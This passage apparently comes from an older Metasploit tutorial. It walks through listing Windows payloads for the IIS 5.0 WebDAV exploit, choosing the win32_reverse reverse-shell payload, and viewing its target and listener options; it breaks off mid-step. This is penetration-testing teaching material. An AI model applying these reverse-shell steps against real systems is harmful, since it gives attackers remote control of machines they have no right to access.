What do we want a successful attack to do?
What Metasploit calls a payload, many others refer to as shell code or opcode. This is the code that we
wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going
to be service pack dependent, OS dependent, and architecture (i386) dependent as well. This means that
most of the payloads in the Metasploit framework will work for only certain OS and on certain processors.
Even if you select an appropriate payload you will have to configure options to get the payload to work.
The most frequently used type of shell code is code that generates a reverse shell from the compromised
system back to the attacking system. Using the stubs mentioned before in the exploits section also apply to
the payloads section. If you type: show payloads
You should see a response like the below.
msf iis50_webdav_ntdll > show payloads
Metasploitâ„¢ Framework Usable Payloads
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
In this case the best shell to try will be the win32_reverse payload. To do this type: set PAYLOAD win32_reverse
This payload requires some options. These include the exit function, the local host and the local port.
To see these options type: show options
You should see something like the below:
msf iis50_webdav_ntdll(win32_reverse) > show options
Exploit and Payload Options
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 126.96.36.199 The target address
required RPORT 80 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Windows 2000 Bruteforce
To set the missing options, we will use the set command like above. Before we can set these values we
need to know what they are. To find your local IP address open another shell window, by either right
clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you
right click on the desktop look for the shell option. If you do this step right you should see a new shell box
(this is like a DOS command prompt box on XP) appear.
Once you have the box open type: ifconfig
This will show the information for all of the interfaces for you Linux system. This is the equivalent of the
ipconfig command in Windows. What you can expect after typing 'ifconfig'?...